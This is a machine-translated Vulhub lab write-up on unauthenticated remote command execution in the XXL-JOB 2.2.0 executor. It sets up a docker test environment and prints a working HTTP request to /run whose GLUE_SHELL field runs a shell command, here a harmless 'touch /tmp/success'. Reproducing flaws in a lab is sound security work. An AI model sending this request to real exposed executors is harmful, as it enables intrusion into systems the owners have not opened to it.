Vulhub vulnerability recurrence 76_ XXL-JOB

XXL-JOB executor Unauthorized access vulnerability

Vulnerability Details

XXL-JOB Is a distributed task scheduling platform , Its core design goal is rapid development 、 Learn easy 、 Lightweight 、 Easy to expand . Now open source and access to a number of companies online product lines , Open the box .XXL-JOB It is divided into admin and executor Both ends , The former is the background management page , The latter is the client of task execution .executor Authentication is not configured by default , An unauthorized attacker can pass through RESTful API Execute arbitrary orders .

Reference link ：

- https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g

- https://landgrey.me/blog/18/

- https://github.com/OneSourceCat/XxlJob-Hessian-RCE

Environment building

shooting range ：192.168.4.10_ubuntu

Execute the following command to start 2.2.0 Version of XXL-JOB：

#docker-compose up -d

After the environment starts , visit `http://your-ip:8080` You can view the management side （admin）, visit `http://your-ip:9999` Can view the client （executor）.

Loophole recurrence

Directly to the client （executor） Send the following packets , You can execute the command ：

```

POST /run HTTP/1.1

Host: your-ip:9999

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Connection: close

Content-Type: application/json

Content-Length: 365

{

  "jobId": 1,

  "executorHandler": "demoJobHandler",

  "executorParams": "demoJobHandler",

  "executorBlockStrategy": "COVER_EARLY",

  "executorTimeout": 0,

  "logId": 1,

  "logDateTime": 1586629003729,

  "glueType": "GLUE_SHELL",

  "glueSource": "touch /tmp/success",

  "glueUpdatetime": 1586699003758,

  "broadcastIndex": 0,

  "broadcastTotal": 0

}

```

`touch /tmp/success` Has been successfully executed ：

  in addition , lower than 2.2.0 Version of XXL-JOB No, RESTful API, We can go through [Hessian Deserialization ](https://github.com/OneSourceCat/XxlJob-Hessian-RCE) To execute an order .